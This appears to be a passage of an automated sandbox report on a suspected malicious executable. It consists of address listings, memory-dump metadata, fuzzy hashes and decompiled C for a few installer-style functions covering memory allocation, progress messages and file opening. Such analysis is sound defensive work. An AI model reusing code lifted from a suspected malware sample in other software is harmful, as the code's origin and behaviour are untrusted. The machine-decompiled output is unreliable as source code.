                                                                                    0x00406174
                                                                                    0x00406169
                                                                                    0x00406169
                                                                                    0x00406169
                                                                                    0x0040617e
                                                                                    0x00406181
                                                                                    0x0040619f
                                                                                    0x004061a1
                                                                                    0x00000000
                                                                                    0x00406183
                                                                                    0x00406183
                                                                                    0x00406186
                                                                                    0x00406189
                                                                                    0x0040618c
                                                                                    0x0040618e
                                                                                    0x0040618e
                                                                                    0x0040618e
                                                                                    0x00406191
                                                                                    0x00406194
                                                                                    0x00406196
                                                                                    0x00406197
                                                                                    0x0040619a
                                                                                    0x00000000
                                                                                    0x0040619a
                                                                                    0x00000000
                                                                                    0x004063d0
                                                                                    0x004063d4
                                                                                    0x004063f2
                                                                                    0x004063f5
                                                                                    0x004063fc
                                                                                    0x004063ff
                                                                                    0x00406402
                                                                                    0x00406405
                                                                                    0x00406408
                                                                                    0x0040640b
                                                                                    0x0040640d
                                                                                    0x00406414
                                                                                    0x00406415
                                                                                    0x00406417
                                                                                    0x0040641a
                                                                                    0x0040641d
                                                                                    0x00406420
                                                                                    0x00406420
                                                                                    0x00406425
                                                                                    0x00000000
                                                                                    0x00406425
                                                                                    0x004063d6
                                                                                    0x004063d9
                                                                                    0x004063dc
                                                                                    0x004063e6
                                                                                    0x0040679d
                                                                                    0x0040679d
                                                                                    0x00000000
                                                                                    0x0040679d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040647d
                                                                                    0x00406481
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406487
                                                                                    0x0040648b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406491
                                                                                    0x00406493
                                                                                    0x00406497
                                                                                    0x00406497
                                                                                    0x0040649a
                                                                                    0x0040649e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004064ee
                                                                                    0x004064f2
                                                                                    0x004064f9
                                                                                    0x004064fc
                                                                                    0x004064ff
                                                                                    0x00406509
                                                                                    0x0040679d
                                                                                    0x0040679d
                                                                                    0x00000000
                                                                                    0x0040679d
                                                                                    0x0040679d
                                                                                    0x004064f4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406515
                                                                                    0x00406519
                                                                                    0x00406520
                                                                                    0x00406523
                                                                                    0x00406526
                                                                                    0x0040651b
                                                                                    0x0040651b
                                                                                    0x0040651b
                                                                                    0x00406529
                                                                                    0x0040652c
                                                                                    0x0040652f
                                                                                    0x0040652f
                                                                                    0x00406532
                                                                                    0x00406535
                                                                                    0x00406538
                                                                                    0x00406538
                                                                                    0x0040653b
                                                                                    0x00406542
                                                                                    0x00406547
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004065d5
                                                                                    0x004065d5
                                                                                    0x004065d9
                                                                                    0x00406977
                                                                                    0x00000000
                                                                                    0x00406977
                                                                                    0x004065df
                                                                                    0x004065e2
                                                                                    0x004065e5
                                                                                    0x004065e9
                                                                                    0x004065ec
                                                                                    0x004065f2
                                                                                    0x004065f4
                                                                                    0x004065f4
                                                                                    0x004065f4
                                                                                    0x004065f7
                                                                                    0x004065fa
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004061ca
                                                                                    0x004061ca
                                                                                    0x004061ce
                                                                                    0x0040693b
                                                                                    0x00000000
                                                                                    0x0040693b
                                                                                    0x004061d4
                                                                                    0x004061d7
                                                                                    0x004061da
                                                                                    0x004061de
                                                                                    0x004061e1
                                                                                    0x004061e7
                                                                                    0x004061e9
                                                                                    0x004061e9
                                                                                    0x004061e9
                                                                                    0x004061ec
                                                                                    0x004061ef
                                                                                    0x004061ef
                                                                                    0x004061f2
                                                                                    0x004061f5
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004061fb
                                                                                    0x00406201
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406207
                                                                                    0x00406207
                                                                                    0x0040620b
                                                                                    0x0040620e
                                                                                    0x00406211
                                                                                    0x00406214
                                                                                    0x00406217
                                                                                    0x00406218
                                                                                    0x0040621b
                                                                                    0x0040621d
                                                                                    0x00406223
                                                                                    0x00406226
                                                                                    0x00406229
                                                                                    0x0040622c
                                                                                    0x0040622f
                                                                                    0x00406232
                                                                                    0x00406235
                                                                                    0x00406251
                                                                                    0x00406254
                                                                                    0x00406257
                                                                                    0x0040625a
                                                                                    0x00406261
                                                                                    0x00406265
                                                                                    0x00406267
                                                                                    0x0040626b
                                                                                    0x00406237
                                                                                    0x00406237
                                                                                    0x0040623b
                                                                                    0x00406243
                                                                                    0x00406248
                                                                                    0x0040624a
                                                                                    0x0040624c
                                                                                    0x0040624c
                                                                                    0x0040626e
                                                                                    0x00406275
                                                                                    0x00406278
                                                                                    0x00000000
                                                                                    0x0040627e
                                                                                    0x00000000
                                                                                    0x0040627e
                                                                                    0x00000000
                                                                                    0x00406283
                                                                                    0x00406283
                                                                                    0x00406287
                                                                                    0x00406947
                                                                                    0x00000000
                                                                                    0x00406947
                                                                                    0x0040628d
                                                                                    0x00406290
                                                                                    0x00406293
                                                                                    0x00406297
                                                                                    0x0040629a
                                                                                    0x004062a0
                                                                                    0x004062a2
                                                                                    0x004062a2
                                                                                    0x004062a2
                                                                                    0x004062a5
                                                                                    0x004062a8
                                                                                    0x004062a8
                                                                                    0x004062a8
                                                                                    0x004062ae
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004062b0
                                                                                    0x004062b3
                                                                                    0x004062b6
                                                                                    0x004062b9
                                                                                    0x004062bc
                                                                                    0x004062bf
                                                                                    0x004062c2
                                                                                    0x004062c5
                                                                                    0x004062c8
                                                                                    0x004062cb
                                                                                    0x004062ce
                                                                                    0x004062e6
                                                                                    0x004062e9
                                                                                    0x004062ec
                                                                                    0x004062ef
                                                                                    0x004062ef
                                                                                    0x004062f2
                                                                                    0x004062f6
                                                                                    0x004062f8
                                                                                    0x004062d0
                                                                                    0x004062d0
                                                                                    0x004062d8
                                                                                    0x004062dd
                                                                                    0x004062df
                                                                                    0x004062e1
                                                                                    0x004062e1
                                                                                    0x004062fb
                                                                                    0x00406302
                                                                                    0x00406305
                                                                                    0x00000000
                                                                                    0x00406307
                                                                                    0x00000000
                                                                                    0x00406307
                                                                                    0x00406305
                                                                                    0x0040630c
                                                                                    0x0040630c
                                                                                    0x0040630c
                                                                                    0x0040630c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406347
                                                                                    0x00406347
                                                                                    0x0040634b
                                                                                    0x00406953
                                                                                    0x00000000
                                                                                    0x00406953
                                                                                    0x00406351
                                                                                    0x00406354
                                                                                    0x00406357
                                                                                    0x0040635b
                                                                                    0x0040635e
                                                                                    0x00406364
                                                                                    0x00406366
                                                                                    0x00406366
                                                                                    0x00406366
                                                                                    0x00406369
                                                                                    0x0040636c
                                                                                    0x0040636c
                                                                                    0x00406372
                                                                                    0x00406310
                                                                                    0x00406310
                                                                                    0x00406313
                                                                                    0x00000000
                                                                                    0x00406313
                                                                                    0x00406374
                                                                                    0x00406374
                                                                                    0x00406377
                                                                                    0x0040637a
                                                                                    0x0040637d
                                                                                    0x00406380
                                                                                    0x00406383
                                                                                    0x00406386
                                                                                    0x00406389
                                                                                    0x0040638c
                                                                                    0x0040638f
                                                                                    0x00406392
                                                                                    0x004063aa
                                                                                    0x004063ad
                                                                                    0x004063b0
                                                                                    0x004063b3
                                                                                    0x004063b3
                                                                                    0x004063b6
                                                                                    0x004063ba
                                                                                    0x004063bc
                                                                                    0x00406394
                                                                                    0x00406394
                                                                                    0x0040639c
                                                                                    0x004063a1
                                                                                    0x004063a3
                                                                                    0x004063a5
                                                                                    0x004063a5
                                                                                    0x004063bf
                                                                                    0x004063c6
                                                                                    0x004063c9
                                                                                    0x00000000
                                                                                    0x004063cb
                                                                                    0x00000000
                                                                                    0x004063cb
                                                                                    0x00000000
                                                                                    0x00406658
                                                                                    0x00406658
                                                                                    0x0040665c
                                                                                    0x00406983
                                                                                    0x00000000
                                                                                    0x00406983
                                                                                    0x00406662
                                                                                    0x00406665
                                                                                    0x00406668
                                                                                    0x0040666c
                                                                                    0x0040666f
                                                                                    0x00406675
                                                                                    0x00406677
                                                                                    0x00406677
                                                                                    0x00406677
                                                                                    0x0040667a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406428
                                                                                    0x00406428
                                                                                    0x0040642b
                                                                                    0x0040679d
                                                                                    0x0040679d
                                                                                    0x00000000
                                                                                    0x0040679d
                                                                                    0x00000000
                                                                                    0x00406767
                                                                                    0x0040676b
                                                                                    0x0040678d
                                                                                    0x00406790
                                                                                    0x0040679a
                                                                                    0x0040679d
                                                                                    0x0040679d
                                                                                    0x00000000
                                                                                    0x0040679d
                                                                                    0x0040679d
                                                                                    0x0040676d
                                                                                    0x00406770
                                                                                    0x00406774
                                                                                    0x00406777
                                                                                    0x00406777
                                                                                    0x0040677a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406824
                                                                                    0x00406828
                                                                                    0x00406846
                                                                                    0x00406846
                                                                                    0x00406846
                                                                                    0x0040684d
                                                                                    0x00406854
                                                                                    0x0040685b
                                                                                    0x0040685b
                                                                                    0x00000000
                                                                                    0x0040685b
                                                                                    0x0040682a
                                                                                    0x0040682d
                                                                                    0x00406830
                                                                                    0x00406833
                                                                                    0x0040683a
                                                                                    0x0040677e
                                                                                    0x0040677e
                                                                                    0x00406781
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406915
                                                                                    0x00406918
                                                                                    0x00406819
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040654f
                                                                                    0x00406551
                                                                                    0x00406558
                                                                                    0x00406559
                                                                                    0x0040655b
                                                                                    0x0040655e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406566
                                                                                    0x00406569
                                                                                    0x0040656c
                                                                                    0x0040656e
                                                                                    0x00406570
                                                                                    0x00406570
                                                                                    0x00406571
                                                                                    0x00406574
                                                                                    0x0040657b
                                                                                    0x0040657e
                                                                                    0x0040658c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406862
                                                                                    0x00406862
                                                                                    0x00406865
                                                                                    0x0040686c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406871
                                                                                    0x00406871
                                                                                    0x00406875
                                                                                    0x004069ad
                                                                                    0x00000000
                                                                                    0x004069ad
                                                                                    0x0040687b
                                                                                    0x0040687e
                                                                                    0x00406881
                                                                                    0x00406885
                                                                                    0x00406888
                                                                                    0x0040688e
                                                                                    0x00406890
                                                                                    0x00406890
                                                                                    0x00406890
                                                                                    0x00406893
                                                                                    0x00406896
                                                                                    0x00406896
                                                                                    0x00406896
                                                                                    0x00406896
                                                                                    0x00406899
                                                                                    0x00406899
                                                                                    0x0040689d
                                                                                    0x004068fd
                                                                                    0x00406900
                                                                                    0x00406905
                                                                                    0x00406906
                                                                                    0x00406908
                                                                                    0x0040690a
                                                                                    0x0040690d
                                                                                    0x00406819
                                                                                    0x00406819
                                                                                    0x00000000
                                                                                    0x0040681f
                                                                                    0x00406819
                                                                                    0x0040689f
                                                                                    0x004068a5
                                                                                    0x004068a8
                                                                                    0x004068ab
                                                                                    0x004068ae
                                                                                    0x004068b1
                                                                                    0x004068b4
                                                                                    0x004068b7
                                                                                    0x004068ba
                                                                                    0x004068bd
                                                                                    0x004068c0
                                                                                    0x004068d9
                                                                                    0x004068dc
                                                                                    0x004068df
                                                                                    0x004068e2
                                                                                    0x004068e6
                                                                                    0x004068e8
                                                                                    0x004068e8
                                                                                    0x004068e9
                                                                                    0x004068ec
                                                                                    0x004068c2
                                                                                    0x004068c2
                                                                                    0x004068ca
                                                                                    0x004068cf
                                                                                    0x004068d1
                                                                                    0x004068d4
                                                                                    0x004068d4
                                                                                    0x004068ef
                                                                                    0x004068f6
                                                                                    0x00000000
                                                                                    0x004068f8
                                                                                    0x00000000
                                                                                    0x004068f8
                                                                                    0x00000000
                                                                                    0x00406594
                                                                                    0x00406597
                                                                                    0x004065cd
                                                                                    0x004066fd
                                                                                    0x004066fd
                                                                                    0x004066fd
                                                                                    0x004066fd
                                                                                    0x00406700
                                                                                    0x00406700
                                                                                    0x00406703
                                                                                    0x00406705
                                                                                    0x0040698f
                                                                                    0x00000000
                                                                                    0x0040698f
                                                                                    0x0040670b
                                                                                    0x0040670e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406714
                                                                                    0x00406718
                                                                                    0x0040671b
                                                                                    0x0040671b
                                                                                    0x0040671b
                                                                                    0x00000000
                                                                                    0x0040671b
                                                                                    0x00406599
                                                                                    0x0040659b
                                                                                    0x0040659d
                                                                                    0x0040659f
                                                                                    0x004065a2
                                                                                    0x004065a3
                                                                                    0x004065a5
                                                                                    0x004065a7
                                                                                    0x004065aa
                                                                                    0x004065ad
                                                                                    0x004065c3
                                                                                    0x004065c8
                                                                                    0x00406600
                                                                                    0x00406600
                                                                                    0x00406604
                                                                                    0x00406630
                                                                                    0x00406632
                                                                                    0x00406639
                                                                                    0x0040663c
                                                                                    0x0040663f
                                                                                    0x0040663f
                                                                                    0x00406644
                                                                                    0x00406644
                                                                                    0x00406646
                                                                                    0x00406649
                                                                                    0x00406650
                                                                                    0x00406653
                                                                                    0x00406680
                                                                                    0x00406680
                                                                                    0x00406683
                                                                                    0x00406686
                                                                                    0x004066fa
                                                                                    0x004066fa
                                                                                    0x004066fa
                                                                                    0x00000000
                                                                                    0x004066fa
                                                                                    0x00406688
                                                                                    0x0040668e
                                                                                    0x00406691
                                                                                    0x00406694
                                                                                    0x00406697
                                                                                    0x0040669a
                                                                                    0x0040669d
                                                                                    0x004066a0
                                                                                    0x004066a3
                                                                                    0x004066a6
                                                                                    0x004066a9
                                                                                    0x004066c2
                                                                                    0x004066c4
                                                                                    0x004066c7
                                                                                    0x004066c8
                                                                                    0x004066cb
                                                                                    0x004066cd
                                                                                    0x004066d0
                                                                                    0x004066d2
                                                                                    0x004066d4
                                                                                    0x004066d7
                                                                                    0x004066d9
                                                                                    0x004066dc
                                                                                    0x004066e0
                                                                                    0x004066e2
                                                                                    0x004066e2
                                                                                    0x004066e3
                                                                                    0x004066e6
                                                                                    0x004066e9
                                                                                    0x004066ab
                                                                                    0x004066ab
                                                                                    0x004066b3
                                                                                    0x004066b8
                                                                                    0x004066ba
                                                                                    0x004066bd
                                                                                    0x004066bd
                                                                                    0x004066ec
                                                                                    0x004066f3
                                                                                    0x0040667d
                                                                                    0x0040667d
                                                                                    0x0040667d
                                                                                    0x0040667d
                                                                                    0x00000000
                                                                                    0x004066f5
                                                                                    0x00000000
                                                                                    0x004066f5
                                                                                    0x004066f3
                                                                                    0x00406606
                                                                                    0x00406609
                                                                                    0x0040660b
                                                                                    0x0040660e
                                                                                    0x00406611
                                                                                    0x00406614
                                                                                    0x00406616
                                                                                    0x00406619
                                                                                    0x0040661c
                                                                                    0x0040661c
                                                                                    0x0040661f
                                                                                    0x0040661f
                                                                                    0x00406622
                                                                                    0x00406629
                                                                                    0x004065fd
                                                                                    0x004065fd
                                                                                    0x004065fd
                                                                                    0x004065fd
                                                                                    0x00000000
                                                                                    0x0040662b
                                                                                    0x00000000
                                                                                    0x0040662b
                                                                                    0x00406629
                                                                                    0x004065af
                                                                                    0x004065b2
                                                                                    0x004065b4
                                                                                    0x004065b7
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406316
                                                                                    0x00406316
                                                                                    0x0040631a
                                                                                    0x0040695f
                                                                                    0x00000000
                                                                                    0x0040695f
                                                                                    0x00406320
                                                                                    0x00406323
                                                                                    0x00406326
                                                                                    0x00406329
                                                                                    0x0040632c
                                                                                    0x0040632f
                                                                                    0x00406332
                                                                                    0x00406334
                                                                                    0x00406337
                                                                                    0x0040633a
                                                                                    0x0040633d
                                                                                    0x0040633f
                                                                                    0x0040633f
                                                                                    0x0040633f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004064a1
                                                                                    0x004064a1
                                                                                    0x004064a5
                                                                                    0x0040696b
                                                                                    0x00000000
                                                                                    0x0040696b
                                                                                    0x004064ab
                                                                                    0x004064ae
                                                                                    0x004064b1
                                                                                    0x004064b4
                                                                                    0x004064b6
                                                                                    0x004064b6
                                                                                    0x004064b6
                                                                                    0x004064b9
                                                                                    0x004064bc
                                                                                    0x004064bf
                                                                                    0x004064c2
                                                                                    0x004064c5
                                                                                    0x004064c8
                                                                                    0x004064c9
                                                                                    0x004064cb
                                                                                    0x004064cb
                                                                                    0x004064cb
                                                                                    0x004064ce
                                                                                    0x004064d1
                                                                                    0x004064d4
                                                                                    0x004064d7
                                                                                    0x004064d7
                                                                                    0x004064d7
                                                                                    0x004064da
                                                                                    0x004064dc
                                                                                    0x004064dc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040671e
                                                                                    0x0040671e
                                                                                    0x0040671e
                                                                                    0x00406722
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406728
                                                                                    0x0040672b
                                                                                    0x0040672e
                                                                                    0x00406731
                                                                                    0x00406733
                                                                                    0x00406733
                                                                                    0x00406733
                                                                                    0x00406736
                                                                                    0x00406739
                                                                                    0x0040673c
                                                                                    0x0040673f
                                                                                    0x00406742
                                                                                    0x00406745
                                                                                    0x00406746
                                                                                    0x00406748
                                                                                    0x00406748
                                                                                    0x00406748
                                                                                    0x0040674b
                                                                                    0x0040674e
                                                                                    0x00406751
                                                                                    0x00406754
                                                                                    0x00406757
                                                                                    0x0040675b
                                                                                    0x0040675d
                                                                                    0x00406760
                                                                                    0x00000000
                                                                                    0x00406762
                                                                                    0x004064df
                                                                                    0x004064df
                                                                                    0x00000000
                                                                                    0x004064df
                                                                                    0x00406760
                                                                                    0x00406995
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405fc4
                                                                                    0x004069cc
                                                                                    0x004069cc
                                                                                    0x00000000
                                                                                    0x004069cc
                                                                                    0x00406819
                                                                                    0x004067a0
                                                                                    0x0040679d

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c10b0ec6d8a1716373c4594016b158d4b4e2bf5790cbb1f15a9d43b973b4a336
                                                                                    • Instruction ID: fa01dbb36adddbb747bc37ce8d7c8691094d52a97b4972d7f98645f49a39bfe1
                                                                                    • Opcode Fuzzy Hash: c10b0ec6d8a1716373c4594016b158d4b4e2bf5790cbb1f15a9d43b973b4a336
                                                                                    • Instruction Fuzzy Hash: B3715671D00229CBEF28CF98C844BADBBB1FF44305F11816AD856BB281C7795A56DF54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00401B06, Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 59%
                                                                                    			E00401B06(void* __ebx, void* __edx) {
				intOrPtr _t7;
				void* _t8;
				void _t11;
				void* _t13;
				void* _t21;
				void* _t24;
				void* _t30;
				void* _t33;
				void* _t34;
				void* _t37;

				_t27 = __ebx;
				_t7 =  *((intOrPtr*)(_t37 - 0x1c));
				_t30 =  *0x40af70; // 0x0
				if(_t7 == __ebx) {
					if(__edx == __ebx) {
						_t8 = GlobalAlloc(0x40, 0x404); // executed
						_t34 = _t8;
						_t4 = _t34 + 4; // 0x4
						E00405B88(__ebx, _t30, _t34, _t4,  *((intOrPtr*)(_t37 - 0x24)));
						_t11 =  *0x40af70; // 0x0
						 *_t34 = _t11;
						 *0x40af70 = _t34;
					} else {
						if(_t30 == __ebx) {
							 *((intOrPtr*)(_t37 - 4)) = 1;
						} else {
							_t2 = _t30 + 4; // 0x4
							E00405B66(_t33, _t2);
							_push(_t30);
							 *0x40af70 =  *_t30;
							GlobalFree();
						}
					}
					goto L15;
				} else {
					while(1) {
						_t7 = _t7 - 1;
						if(_t30 == _t27) {
							break;
						}
						_t30 =  *_t30;
						if(_t7 != _t27) {
							continue;
						} else {
							if(_t30 == _t27) {
								break;
							} else {
								_t32 = _t30 + 4;
								E00405B66(0x409b70, _t30 + 4);
								_t21 =  *0x40af70; // 0x0
								E00405B66(_t32, _t21 + 4);
								_t24 =  *0x40af70; // 0x0
								_push(0x409b70);
								_push(_t24 + 4);
								E00405B66();
								L15:
								 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t37 - 4));
								_t13 = 0;
							}
						}
						goto L17;
					}
					_push(0x200010);
					_push(E00405B88(_t27, _t30, _t33, _t27, 0xffffffe8));
					E00405427();
					_t13 = 0x7fffffff;
				}
				L17:
				return _t13;
			}













                                                                                    0x00401b06
                                                                                    0x00401b06
                                                                                    0x00401b09
                                                                                    0x00401b11
                                                                                    0x00401b59
                                                                                    0x00401b87
                                                                                    0x00401b90
                                                                                    0x00401b92
                                                                                    0x00401b96
                                                                                    0x00401b9b
                                                                                    0x00401ba0
                                                                                    0x00401ba2
                                                                                    0x00401b5b
                                                                                    0x00401b5d
                                                                                    0x0040265c
                                                                                    0x00401b63
                                                                                    0x00401b63
                                                                                    0x00401b68
                                                                                    0x00401b6f
                                                                                    0x00401b70
                                                                                    0x00401b75
                                                                                    0x00401b75
                                                                                    0x00401b5d
                                                                                    0x00000000
                                                                                    0x00401b13
                                                                                    0x00401b13
                                                                                    0x00401b13
                                                                                    0x00401b16
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00401b1c
                                                                                    0x00401b20
                                                                                    0x00000000
                                                                                    0x00401b22
                                                                                    0x00401b24
                                                                                    0x00000000
                                                                                    0x00401b2a
                                                                                    0x00401b2a
                                                                                    0x00401b34
                                                                                    0x00401b39
                                                                                    0x00401b43
                                                                                    0x00401b48
                                                                                    0x00401b4d
                                                                                    0x00401b51
                                                                                    0x004027b1
                                                                                    0x0040288b
                                                                                    0x0040288e
                                                                                    0x00402894
                                                                                    0x00402894
                                                                                    0x00401b24
                                                                                    0x00000000
                                                                                    0x00401b20
                                                                                    0x004021fb
                                                                                    0x00402208
                                                                                    0x00402209
                                                                                    0x0040220e
                                                                                    0x0040220e
                                                                                    0x00402896
                                                                                    0x0040289a

                                                                                    APIs
                                                                                    • GlobalFree.KERNEL32 ref: 00401B75
                                                                                    • GlobalAlloc.KERNELBASE(00000040,00000404), ref: 00401B87
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Global$AllocFree
                                                                                    • String ID: Call
                                                                                    • API String ID: 3394109436-1824292864
                                                                                    • Opcode ID: 3001eae6ec482850bea73fdbff5ef22828da0663e2238209e73fb69c283a7197
                                                                                    • Instruction ID: f6df762d61d54559a5bd4bb911f236f7c2d089bf7a2c1af573ad77b5def0dbe6
                                                                                    • Opcode Fuzzy Hash: 3001eae6ec482850bea73fdbff5ef22828da0663e2238209e73fb69c283a7197
                                                                                    • Instruction Fuzzy Hash: 9F2181B2A006169BC710AFA4DE85D5E73B4EB44318724463BF502F32D0DB7CB9129B5E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 69%
                                                                                    			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x423ed0;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42368c =  *0x42368c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42368c, 0x7530,  *0x423674), 0);
					}
				}
				return 0;
			}











                                                                                    0x0040138a
                                                                                    0x004013fa
                                                                                    0x0040139b
                                                                                    0x004013a0
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004013a2
                                                                                    0x004013a3
                                                                                    0x004013ad
                                                                                    0x00000000
                                                                                    0x00401404
                                                                                    0x004013b0
                                                                                    0x004013b7
                                                                                    0x004013bd
                                                                                    0x004013be
                                                                                    0x004013c0
                                                                                    0x004013c2
                                                                                    0x004013b9
                                                                                    0x004013b9
                                                                                    0x004013ba
                                                                                    0x004013ba
                                                                                    0x004013c9
                                                                                    0x004013cb
                                                                                    0x004013f4
                                                                                    0x004013f4
                                                                                    0x004013c9
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                    • SendMessageA.USER32 ref: 004013F4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 3850602802-0
                                                                                    • Opcode ID: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                                                                                    • Instruction ID: b71ad761f0ea07ecc4e6183a90c0cd8288537aab3e92bb5761005deb6e4a9b1f
                                                                                    • Opcode Fuzzy Hash: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                                                                                    • Instruction Fuzzy Hash: 20014431B24210ABE7291B388D08B2A32ADE714315F10423FF801F32F0D678DC028B4C
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040583D, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 68%
                                                                                    			E0040583D(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                                    0x00405841
                                                                                    0x0040584e
                                                                                    0x00405863
                                                                                    0x00405869

                                                                                    APIs
                                                                                    • GetFileAttributesA.KERNELBASE(00000003,00402CB5,C:\Users\user\Desktop\5SXTKXCnqS.exe,80000000,00000003), ref: 00405841
                                                                                    • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405863
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: File$AttributesCreate
                                                                                    • String ID:
                                                                                    • API String ID: 415043291-0
                                                                                    • Opcode ID: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                                                                                    • Instruction ID: 90a47e22fdd321f70bf06df01bfdefa11f3e73682391c7296034eb3a8fe04f39
                                                                                    • Opcode Fuzzy Hash: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
